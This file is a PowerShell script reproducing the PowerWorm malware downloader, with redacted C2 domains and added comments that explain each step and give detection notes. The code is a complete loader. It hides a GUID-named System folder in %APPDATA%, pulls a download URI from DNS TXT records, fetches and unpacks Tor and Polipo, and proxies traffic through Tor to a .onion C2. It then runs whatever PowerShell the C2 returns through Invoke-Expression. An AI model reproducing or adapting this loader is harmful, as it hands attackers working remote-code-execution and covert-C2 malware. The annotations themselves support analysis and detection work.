<#
TERMS OF USE: Considering I am not the original author of this malware, I
cannot apply any formal license to this work. I can, however, apply a
gentleman's clause to the use of this script which is dictated as follows:
DBAD Clause v0.1
----------------
Don't be a douche. This malware has little to no legitimate use and as such, I
reserve the right to publicly shame you if you are caught using this for
malicious purposes. The sole purpose of publishing this malware is to inform
and educate.
Lastly, I have redacted portions of the malware where necessary. Redactions
will be evident in the code.
#>
<#
This payload is identical to that of PowerWorm_Part1.ps1. The only difference
will be the GUID in the 'mom' C2 URI parameter.
#>
# Suppress all non-terminating errors: failed lookups, downloads or missing files
# produce no output, so the script stays quiet even when individual steps fail.
$ErrorActionPreference = 'SilentlyContinue'
# The host's SMBIOS UUID (Win32_ComputerSystemProduct.UUID) is the per-machine
# identifier reused throughout: as the persistence marker checked below, as the
# name of the tools directory and zip under %APPDATA%, and as the 'uid' C2 parameter.
$MachineGuid = (Get-WmiObject Win32_ComputerSystemProduct).UUID
# Single-instance check: the current user's Run key is stringified and regex-matched
# against the GUID. A hit means persistence was already established (presumably by
# another stage -- this file never writes the key) and this copy stops itself.
# Detection note: a Run value containing the host's own SMBIOS UUID is a
# host-specific indicator for this family.
if ((Get-ItemProperty HKCU:\Software\Microsoft\Windows\CurrentVersion\Run) -match $MachineGuid)
{
Get-Process -Id $PID | Stop-Process
}
# Resolves a download URI from a DNS TXT record, fetches the zip it names and
# unpacks it into $ToolsPath.
# Arguments: $DnsHost - name whose TXT record carries the zip URI (only ever
#            called with string literals further down).
# Relies on script-scope variables that are assigned after this definition but
# before the first call: $WebClient, $ZipPath, $Shell, $ToolsPath.
# Returns: nothing. Side effects: a zip written to and then deleted from
#          $ToolsPath, and its contents extracted there.
function Get-DnsTXTRecord($DnsHost)
{
# nslookup is run through Invoke-Expression against 8.8.8.8 directly, bypassing the
# host's configured resolver. Output lines containing a double quote are the TXT
# strings; the quotes are stripped and the first such line is taken as the URI.
# Detection note: nslookup.exe with -querytype=txt as a child of powershell.exe,
# and DNS traffic to 8.8.8.8 that does not pass through the local resolver.
$ZipFileUri = (((Invoke-Expression "nslookup -querytype=txt $DnsHost 8.8.8.8") -match '"') -replace '"', '')[0].Trim()
# Download the archive to the GUID-named zip inside the tools directory.
$WebClient.DownloadFile($ZipFileUri, $ZipPath)
$Destination = $Shell.NameSpace($ZipPath).Items();
# Extract with the Shell.Application COM object instead of a .NET API; the flag
# value 20 (0x10 | 0x4) suppresses confirmation prompts and the progress dialog.
$Shell.NameSpace($ToolsPath).CopyHere($Destination, 20)
# Drop the archive so only the extracted tools remain on disk.
Remove-Item $ZipPath
}
# Tools are kept in a directory under %APPDATA% named after the machine GUID.
$ToolsPath = Join-Path $Env:APPDATA $MachineGuid
# Create it and set 'Hidden', 'System', 'NotContentIndexed' so it is invisible in
# default Explorer views and excluded from Windows Search indexing.
# Detection note: a directory under %APPDATA% whose name is the host's SMBIOS UUID,
# carrying both Hidden and System attributes and containing tor.exe / polipo.exe.
if (!(Test-Path $ToolsPath))
{
$Directory = New-Item -ItemType Directory -Force -Path $ToolsPath
$Directory.Attributes = 'Hidden', 'System', 'NotContentIndexed'
}
# Binaries expected from the downloaded archive, and the archive's own path.
$Tor = Join-Path $ToolsPath 'tor.exe'
$Polipo = Join-Path $ToolsPath 'polipo.exe'
$ZipPath = Join-Path $ToolsPath ($MachineGuid + '.zip')
# Script-scope objects that Get-DnsTXTRecord reads; they must exist before it runs.
$WebClient = New-Object Net.WebClient
$Shell = New-Object -ComObject Shell.Application
# Fetch the tools if either binary is missing; the second (redacted) domain is
# only tried when the first attempt still left a file absent.
if (!(Test-Path $Tor) -or !(Test-Path $Polipo))
{
Get-DnsTXTRecord 'REDACTEDREDACTED.de'
}
if (!(Test-Path $Tor) -or !(Test-Path $Polipo))
{
Get-DnsTXTRecord 'REDACTEDREDACTED.cc'
}
$TorRoamingLog = Join-Path $ToolsPath 'roaminglog'
# Launch Tor with no window, logging at 'notice' level to a file in the tools directory.
Start-Process $Tor -ArgumentList " --Log `"notice file $TorRoamingLog`"" -WindowStyle Hidden
# Poll the log once a second until Tor reports a finished bootstrap. There is no
# timeout: if tor.exe is blocked or cannot reach the network, the string never
# appears and the script stalls here indefinitely.
do
{
Start-Sleep 1
$LogContents = Get-Content $TorRoamingLog
}
while (!($LogContents -match 'Bootstrapped 100%: Done.'))
# Start polipo as an HTTP proxy chained to Tor's SOCKS port (9050); Net.WebProxy
# below speaks HTTP, not SOCKS, so polipo bridges the two on 8123.
Start-Process $Polipo -ArgumentList 'socksParentProxy=localhost:9050' -WindowStyle Hidden
# Fixed grace period for polipo to start listening.
Start-Sleep 7
# Route all further WebClient traffic through the local polipo -> Tor chain.
# Detection note: powershell.exe spawning tor.exe / polipo.exe, and loopback
# connections to 8123 and 9050 originating from a PowerShell process.
$WebProxy = New-Object Net.WebProxy('localhost:8123')
$WebProxy.UseDefaultCredentials = $True
$WebClient.Proxy = $WebProxy
# Stage 1 C2 endpoint on a Tor hidden service. Per the header comment, 'mom' is the
# only field that differs from Part 1 (a campaign/variant GUID); 'uid' is this host's GUID.
$Stage1Uri = 'http://REDACTEDREDACTED.onion/get.php?s=setup&mom=REDACTEDREDACTED&uid=' + $MachineGuid
# Retry until a non-empty response arrives. Under SilentlyContinue a failed download
# leaves $Stage1Payload unset, so this loops with no delay and no attempt limit.
while (!$Stage1Payload)
{
$Stage1Payload=$WebClient.downloadString($Stage1Uri)
}
# Anything other than the literal 'none' is treated as PowerShell and run as-is:
# there is no signature, hash or transport integrity check, so whoever controls the
# C2 gets arbitrary code execution. Invoke-Expression on a string fetched over the
# network is the highest-value detection point in this script (where script block
# logging is enabled, the expanded payload text is recorded).
if ($Stage1Payload -ne 'none')
{
# Execute the stage 1 payload
Invoke-Expression $Stage1Payload
}